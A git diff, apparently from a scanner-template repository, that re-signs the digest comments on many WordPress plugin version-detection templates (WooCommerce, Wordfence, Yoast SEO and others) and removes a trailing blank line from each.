newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 5d94deea0c..d5399c3949 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022075936708ce214635fce5787252f2f6945b4101071705e57cb2a8182bd16bb2f1022100872047dd782b13eafee9166ec32bdc5848d497e6d4058953dc53744334c72986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200242f60dd9fed1acf4679642fa23124fa4e0863c324751866fc6b0ddfd6af8d002203aebab0f39f330d3f60ee24c00077ac7592e47aba7036ad2dd0090d082bd5ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index e994cc0f3e..2fb72268c5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201053423bbcb4ed890db451d668691eecd2e34d0e93935ea41e83902d9f5bcd29022100d6445329e026ddd26b69f2a11e380b8dfac46a3d7bf2e94fc3a8e3d3d59ad15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0dff78c669838a7d9dfe629b4fb1284d874af0666bd01b3cdd9458bc7c8b967022034a060a400d05a9101ca363dd177f16ca707362653117c496561276bbfd09294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index da4ec0b77a..48abddfc18 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206645534cea1ca9b7748c1917f5e74672eefc54f4057ef883a003c1d66707c5490221008c7dbe464266b1cadf3438fd4f4b2c3fda5c473d8a18178cf6b231f398436c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e30ccb44a8ed8b85ec210af0caa24919ab238564c73fbd0e7b4f83f557f0a100220690796c8d7a9e6d25b2515213b52af45eea62cf1fe02480be7d49de39f5ccafd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index db103a8899..5ad9b56756 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204e34ca501a39b56e1557fdd2505fe226e5d62ae607c6da3822cbc6219946d9fa022100dfe8d4a67dcecf595cb1c2eb2deecef21beed70fb54f056b073bfe9a305513a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eaa42313ab670fe4e6687053b279135caae38cf108ebf84d727e7f13f965ff5802200382673bdbf60a7fa7d536715ee5a26aa70c4b7113326769cb00e034d3e4a112:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 9dbb529529..6e37227351 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e713c4e50c16700644d950820561521f096cd472c373605b94c6513f0fe6ff580220486cf792eeaafc81884b44411d47709feb56103c146c481ac9152f53f59bb510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c836fc13944ab99065f51b7c1c63a0e28ef062302646c2480c985c9574640ff022100b92e0d0c36cc0279bc9c6bfb22aa10f327c0f24a7f5260e163f18f3c82d9cd24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c368e1eef7..11a66f90ed 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220275482125dec4dad3ab8fde5155d31ec7a83b40acdf436ff8b23dfe9b7b1acb40220353fb9a77db54d0df73dee1ddd290645e77b599dd4e5bec2dedc132f476f44b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210084eac8b19f02bffff426a8ad0baccb5b30428fb5ee55cde72a5e6c6cd904727802205f87d508fbb79ac74ff25324e7284bd36414bc2192d12f2ade23afae084860c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index b5d1d2630c..b9bd62d615 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008680fd4a72d9df0edf57061f87033b28bfd77d83d385e9584016ea947126a8d302206a7993b0974bb766b2230cec528170b487a00058dfc7df38395a2970bbbebdd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e6fbc0bd9e82b77071570a77b280e634e90cdfdf520f1a8eed2460c175dec8b0221009ba0e3e0b7b046f0c6df598faf577ff8a00add2a7341a7dbc99f399f96c16b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 1559438d68..ea6a8c74ab 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022008f0526345dbdd0da57de04fcb607112efd66e418c5e5dc53ed79d2997a91c44022100d6d497aec3cdb879952b78a573f548bbb2fea14cf82eaf71c10d6de62b2b2170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078835071c88cb4877066ea44b8eefbe7ccb1170758bc40da6b95813b37b1f5f102210095c5741c3f6224007e7c967b31d393484b4fbade86bee9cc6fd0cbdbe9bd5603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 7ae55020cf..4c5987d231 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100825a495c9936e4dc792365c1e5063fd021014214830db2fa8930cd3b1e4ab63b02200149fdeafbfbeeaebc9245b59650a19b1078a188d4f008804ed6566a2b804d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bdc3128d6a20c6116451e1c3bb8f20c4ad8a7da6c2c34809ac9484f56ace8ac8022100c7a181902cdf89d879e3157010439feb1499d90a7137ed2473cd98ea74c7d5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 5821caecb2..7b6b89917e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201cc4f86a33e0474c2dc9ae3960ad1ad2e31a362194b9e77094e7453a1aa4f7f1022100acf180ffc5b41b014313de0f75fa54a480e7382871250474718ed11a8c6a91bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041b0acbb2791e5139ee96ae85a7b8b26358aee3299dc7f9e0ea3e1eed44353df022100ab9d2744991a56efe90e923eae99f4ccc13a540fabe58305e1ff855fddab42df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 22ac3b5d49..0d9498f575 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a3f76ac8e9361685601c693a9e4eef07f3cb32aefa87a3a1d4f46262514f595b022028beb040a698c382bbe5df25eaef2fabd001f1d910167a012a1468b5a156e2dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220483255a39382250a77691c29ec17ba3c4b1ac6e7d5b67c5f35ab1aa0ad6bc2ca0221009024fc0b2a4e2e85084515d3354f7a8843230e906e502bfe0f8105f6e001c204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b878f06c15..8e01983e6a 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100980a38f0b64ba9386218a21ca834407dae5c46560a29eb67d95427e389b901bf022100c8cf3080ebb42a4d0dce4dcc69a68f5da11d4f0bed02c7ffb02582d8fa9a04bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ad00a86fd755db9c175b8804f83f87c678bed80e6c4afa36f757f883f8d89393022100bb2e665d88fca3cd1079596517b4e59048d783d4c3ca5d3816170e4bc0b91f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index f382178b6f..de282a9bc4 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205cf88bab5fa85a4ac47d1b1c2edf8e8301fe78548d6da8e2d7f7c0ee9f0b8f0e022100a62e1461aaef40007fb4a77c3ac99dea11b57e0b6f98b54120c575acbcafc03f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c06f5e2003e7068cc10ad14a9487ef6cce5b17996888021d89de3f9700222a3102210099816350f0c630c300f28b76a3b847fdc9a5a9a757dc5c287a8191a6b2af1024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 7774091e5b..58dfe2f524 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022014eb17fc306927a61ef0231ab84614450e2646562a31c834998f756c100526f1022100ad8929f17ac02a611e5d79da5e15ac0c155deea6950ed6e7f7a4079762bd8d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220186a691bd893574f7c31b1a72476e4fd70dbcf93a043cee40669a37f40ab2632022037cc305ef130a112a373a0ee4afba69942023cf48dff2a83b4c4c1011b075b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 0900d3af95..b7996f3cea 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b0e4131ad02772c3a18557a378f6bcca537954f126cf31a10c26683252c94ca6022100af3708e6f5fdd868cc1da307791bf1aabe119448961b32a6a60f6b9b60f2eedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002f2995dd4cac3580d5cdf08dd2bb1df88f7977161a282b0a1b6a912fb2b088c0220257a09ff1bc48f19ac0f4b55403aab9d69edd5ea5075f56a39dd8a0dcbf873cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 8c425088d2..c34815cf58 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022015bbc14d6e08426bbf37e6196790ba59a3cc917e21cdd6908e26489f22809d01022100889d9c4d94ede9370bfe890d23d99003a1a8db22ace52abaf647d718c3b5a100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b8c8de57b3ef868bc673c544212b1c30d8464c746af266a84464d56b337ccab6022100f986cb5fd5030de614ae7f99b20e4256e77644c82440aaef7e3bd9f9d3d39f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 176dabbb20..53af2b28e0 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203cf90902831ab27f1617c3596d26f190434612b05a82b8be011cb25544de5a90022100f690e64933d8c64610ff0663e4037795a81fd00630acc674452d03e74e28744d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b523b3a2fca5b4d676a2cb7e344af8d91df3c309d0096e745bd8a7388fbea6dc022100dac0e84f2a2ee1adf56c1eff50e26c1c287140f2ec791ec173c398df52622eff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 23deecaa2d..e6de005ad6 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201d5fd10904a5eb0d851436605e10265e4838dd7c698f7fcf7f487d6fde943b7202204e1e2b5aee3b3c32c3c077abc18539f718dc773cbeaf3db5fa8b743efcb45d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ed1424f74492a9906e975f2169a5fcf5c604b707de7bee8feee3ee5aae71a4a022100ec24d5ffe1fcd71f4fa4aac8a6e1380d4d7a39343f0354994ba6d2a1c202aa78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 3b3d93a1bb..e77981b644 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cd22f4ed7c42febfdd02b0d4ac5bd6708408e5b9a82f99d608472a2b1788e35a022100e6fa269d7a46d65a4fed63b8b26d538e1091603896e172359d0c0dd649ca8bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046b080ec8343c7f984c417977e97c791be17c75d8ec4e4bf575ca49d2d177c5f02206e1db6d50c84792f0da20a6c1358b1be623b6ce328af9898848f83977d4dd2dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 4d6955c516..4fbd7aa78c 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022057c1314e94c324093438bd497b674bf80657b0ed3650928af08a51081879dae20220427c52d205cb413ecab7b4e2468f3009d2978a4d17b1d04a2ff265cb500af144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9b20f8f91791ff1f37ed22e26e05dc33dd3e112d7ec7d1a527165245e39b7a802202c4111faf4fa4bf9c4577c8a99657a4aa3eba9fd1d60efc6b57c1146aa86fe36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 8b5bb06f6f..8db1642d33 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207adc60c49da00411c2da57ebb61248fb614a37f381fa30af838c52b81d36d42f022100901de1663a2f5030c3a346fa22ef3549a20c4d61a630726a35ca3e699ec9c8fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220494ca23444c358f769370b23ba07f404d29af2a2051d147effd56d8512186f9c02200c25f8d84c066390c51859627b091aa83f6a558c7006f3e6bbe85c0b09ce392e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 1af4f7f0d8..44b25621a2 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a7333bbb3ca2d56ed9cd28ada7a937e1f47763d551b453df21fb96b35adc04660220217c59fbf857bf5d48dd4745e3fad673d1fb69c02180a5732d3670dcc8e0116b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c1e4fab3962e49d444f26e80baded135da0705282dbe9b7168fa0c5bcb6c3b4c022072f8aeb520f111bfc58e7ea321083be1a34a054ad24f0d5553b0028233ca86e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 4d98b7dcd2..9f8ec0558b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e0c5ddc200988922cacb0a1068f666fe58ec5956515c9ad1255e4f296a03cc6f02201d0fffc5722febc2b6fdec74adc24fa6f59bd2e38088402842afc68a28f3d483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008be6a9462e881a54dcab0d2cfd2bffe67e16663104d4d0b3f2a66669a9ce86df02202ffa28ec046230974fcd9761f63c9e6a8618dd29dbb365338593ab5f04f87cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index da83918577..6219f30d4c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200d99ebb76b6d4d3acdf8705491d8aae656eaf7fcd36735c7f05e8ddfcd0287f6022053c5f1419b87229b9728721b038634c2d633a23b5ef009d2d88583ca4deb73e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e6ea7990e8579455a76f84b55da17b3d6180a3e2f7a18c372810d53bfbd0000022100fc16ded44ae6941aed283a38a3aa77f31fe5f3e48a5f6d112794f846c1f947e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 922955890d..d158101f8f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b9a8f803c24c6aff055f47be602deab2ffcd415aefda515bd4026bfcb381b9c102200da0fc8c18c69e6e88735241ba18e51b649e643cee660fbdf619f92b4962ade8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220752a299781c91592ea684373e70e02de90855fd4983a8150b7f431edbb4eb01c022100934e5134f74e864b7a8acc11adf673ffef8627a45deb8b39e3dd16a79499a534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 8f398ec1c0..de3c3761d3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fd2828ffbf5bb73425274803a2c5a39bced9930db9bdccbba0a344348f2ad91c022032d107ca514b52fd92a507aa50a0a21b4b12089bafd6c72a041a80f5161e1c38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b64c9e597f6ab19793b67f6ab5adb736b16556a3fd7b46a59a40bf443fc09790221008f548ec75daf696d09a9727dc366a9ab28c5a2824f4658b576b2d53db222ab32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 8a521cb683..39ed5186ad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100be1213813634dfc056cb834fbcaa4baa9d29a3734391a331f8111917d8b13aa10220735ae76e2561d250038b20ad46dec72cbd3b432ed67b995d74dbe9c5a036b1c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200aca9ff808435653b21d49734faad0de2affe0e7a82512abd916d0f1f34950570220377c68a0a91be978c4d3d6034792ecdf088be43378d50f6c9bc2ca2faa562059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 684cdf1dcc..f6cce6c258 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220587c6475b9f4b2d7e1542ba4184288769e1855b9de375316e0b23ba42ce432b3022003e4953ad84ae38ec90b5dcd702d978899eef26e13d848688ef6d5210ecf900d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b23d640c2266394aae35fcf47c9e1279001b18e40d3b8c0c50bd58e8a151cfde02206f36b65784f9826c502e211027fdd9bb121d0054735c8caf7921136145642667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index ebf2336c6a..95d368b09b 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100db2a13bf8e14f7a19c516260e11bf23062223e36a0b23b7eb04b8581872ddd940220541bb9a9443610c161a1862b6a1f73fba7ce28077cdf358d928b296956a5272b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff7c9178da5d9a0188f18fad7a07cfe5a64f8090767e113d8f60014108298b27022100c52a3c9bc75bd9fcc39a31d67300aa664481f2d8c1948c20de2a752f088477bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 9dbbe05bbc..7855f36c4b 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210088ec2dd45c60ce953b6757e0e42ca2dc5c7f8160a34920cac8a47013a588584902203f8a51efbcc73721230f2cd56473c1562bfc05c5347f011619d2fabbdcb85f3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220383a0db217b6318eb530beeb6b0ab94cc8c19d1a655cfaec6972890dbb1bef55022062f240e689292ba598236be0550d830e12fd0d123f32cdb248da35ef2cbf48a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index f680a30c93..6ab20ca37a 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022070f571dab5b67de791ef4d7953767d4fce07187140da9094ebb459013b4bf284022100c1b70b6b486944116dad5d5b91eab481ddf90d45e6f15944942f7fca1d56b350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ef25beb80c3607e7dad04936c896ab95b24d1ce1484166bd21dc430b5928113022100925b53961b006e7ab764e3d60c85180f03b839e2bcb2d503464abee835c4c868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 30c4c87016..fbc1d6e104 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022036dbdad43ccfed93897ff783ad82e142e10b2571433be1c45c0b46c255e778440221009a044ad841b31066742ebe90403a9e6c0e6df95c3164028eeb4943fe049be851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037f7bc6142f65677e2410da5658bed06aa8857c849d99eb85e744a692cdd2ea3022050da62f4034015d83760d715b54edc5c6b06cbbf827aa3f5b8ed408ddf62c776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 9d62d58510..9a50db9d2c 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206accbf78c87548e9dbadb79a55d46c494536ae37d0c10ce3d1729daad1eb2316022100ce4f8929efcbf475d87414800d0ed060b552eabd74d59ccb431f8cfa2565e05c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5c65e59e8ab60937457a90d069ca72053cda1d24d2cb6c6fd056ecbeead7e06022100807d979374cb51b8dfa2dfccce25d7a024120b87079337b632e7eae5f72739be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml 